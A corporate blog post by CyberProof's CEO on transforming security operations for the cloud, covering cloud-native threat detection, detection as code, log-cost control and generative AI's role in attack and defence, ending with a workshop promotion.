Cybersecurity transformation: Threat detection in the cloud
Retooling, opportunities to control spend, and yes, generative AI
Tony Velleca, CEO CyberProof, a UST company
At CyberProof, we’re an extension of our client's SOC, so we have a direct line of sight into developing trends in the threat landscape.
Tony Velleca, CEO CyberProof, a UST company
The dramatic move to public cloud has delivered numerous opportunities to businesses, but at the same time, it’s created new security threats. Defense boundaries are gone, and attack vectors have grown exponentially as cloud-native infrastructure expands. Security threats include infrastructure misconfiguration, unauthorized access to business resources, vulnerable interfaces & APIs, and hijacking of privileged accounts.
Clearly, businesses need to adapt and transform their security operations to comprehend a cloud architecture. And when I say security operations, I specifically mean all the tools and techniques used to sense a potential security attack. For example:
- Cloud context: Traditional threat detection tools lack a cloud context. Threat detection and alerting need to be extended to include cloud-native applications, containers, container hosts, Kubernetes environments, and serverless platforms.
- Security policy in Infrastructure as Code: Dev teams are using IaC scripts to rapidly provision resources. However, infrastructure as code requires security policy as code, meaning scripts should include security components such as detection rules, playbooks, and integrations incorporated into the configuration.
- Cloud-native app security: Security is a shared responsibility between businesses, service providers, and cloud vendors. While cloud vendors provide a solid and secure infrastructure, businesses are responsible for their applications and APIs, which are increasingly targeted. It's important to understand the kinds of risk you're creating when code is being written. Cloud-native application layers create a lot more complexity, and in turn, vulnerability.
Threat hunting as code
The dynamic and ephemeral nature of the cloud (a large portion of containers exist for less than 5 minutes!) poses a real challenge for incident detection and response. Static detection rules are not enough anymore, so comprehensive security ops should have real-time monitoring of anomalous behaviors and malicious actions.
This requires aggregating large amounts of log and sensor data- by your SIEM, SOAR, and EDR - then processing it more efficiently to respond to vulnerabilities and attacks. A security data lake can be very effective in automated threat hunting- what we like to call hunting as code- and there are new tools available that can handle the large amount of data being generated and used for threat detection.
Retooling to cloud-native solutions may be difficult for many organizations, but the transition presents a great opportunity for increasing cloud security. Microsoft Sentinel and Google Chronicle are cloud-native solutions that have AI tools built into them, so everything is in one place. When log data is consolidated into a data warehouse, analysts can conduct time series analysis that identifies trends or finds complex relationships and patterns. Wrapping this data with observability tooling provides richer contextual information resulting in better conclusions and more precise estimations of the problem.
Another advantage of cloud-native security tools is speed and scale. When an attack occurs, you must rapidly triage by running forensics. It often took days in legacy environments because you had to set up your data warehouse for ingesting logs, develop your queries, and then run those queries. With cloud-native security tools, you can do all of this instantaneously, significantly increasing the efficiency of security operations.
New tools, new skills
These new environments are almost completely based on code. In the on-prem world people were trained to follow proprietary security rules as they installed new hardware. Now everything is written as code: your infrastructure is code, your detection rules are code, and your playbooks are code. There's a lot of automation capability built in, but it requires detailed analysis about how to restructure your security ops.
This is a hidden challenge that most companies do not fully have their arms around: the change in talent needed for efficient security operations in the cloud. There already isn't enough talent and cybersecurity to go around, and retraining is not a trivial task. We need to take people that have always worked a certain way and have them learn some new skills.
Best practices for log data can reduce cloud spend
Clearly, there are tremendous opportunities to improve the job of detecting, responding to, and preventing cyberattacks using cloud-native tools. Surprisingly, this transition also provides the opportunity to reduce cloud costs or at least keep costs the same as when legacy tooling was in place.
Filtering out some log data and sending it directly into your security data lake rather than to your SIEM or EDR will greatly reduce cloud storage costs, for example. Traditionally, large amounts of uncompressed data flowed into a SEIM/EDR tool, which charges you for the amount of data that has been ingested plus storage costs. But data flowing into a cloud based SIEM/EDR can be filtered, so only detections are sent. And since your SIEM/EDR is only focused on real-time alerting and detection, you could also filter out any data that’s only used for regulatory compliance reporting.
Having people constantly look at parsing, aggregating, and filtering data based on context is a vital skill in a cloud-native SOC. To me, this is a new role in the organization. Someone needs to look at cost and optimization constantly, determining what log data is required (or not) in various repositories. If you are not doing this, you'll find very quickly that you'll be limited in what you can do with all that log and sensor data, and your costs will go beyond your budget.
Thoughts on Generative AI for cybersecurity
The SOC is in the day-to-day fight to stay ahead of cybersecurity threats. At CyberProof, we’re an extension of our client's SOC, so we have a direct line of sight into developing trends in the threat landscape. For example, right now we are seeing a dramatic shift in the frequency and sophistication of attacks.
Geopolitical tensions, for example, have given rise to nation state-level attacks that are motivated to steal information or disrupt infrastructure. We've also seen changes in the market as the result of ChatGPT or generative AI. This technology has armed attackers with the ability to use AI to form new attacks and rapidly adapt malware to avoid detection. Sadly, you can go out on the dark web and find any number of attacks or ‘goods and services’ for sale. Yuval Wollman, President of CyberProof, explains about how generative AI is impacting cybersecurity in this article.
On the bright side, AI can be used in ways to help your cyber defense as well. At CyberProof, we are leveraging generative AI to accelerate the development of detection technologies, rules and playbooks, as well as for training purposes. For example, we’ve been running tests that take large sets of log and sensor data and leveraged ChatGPT to give us some insights into that information. The results are promising, and we believe there's some great possibilities in using generative AI to make ourselves more agile in developing detection and response strategies.
I realize I have used the word ‘threat’ in this blog more than I’ve used the word ‘opportunity,’ but transforming your SOC for a cloud-native environment does present many opportunities for greater speed and precision in identifying risk despite the increased complexity of the cloud. And yes, you can improve your agility to detect and respond while reducing the overall cost with a well-designed SOC. Our goal is to help our clients accelerate their cloud SOC transformation and architecture strategy to improve threat coverage, all while optimizing cloud spend.
To learn more about how to adapt security operations for the cloud, schedule a complimentary Cloud Security Transformation Workshop with one of our cybersecurity experts.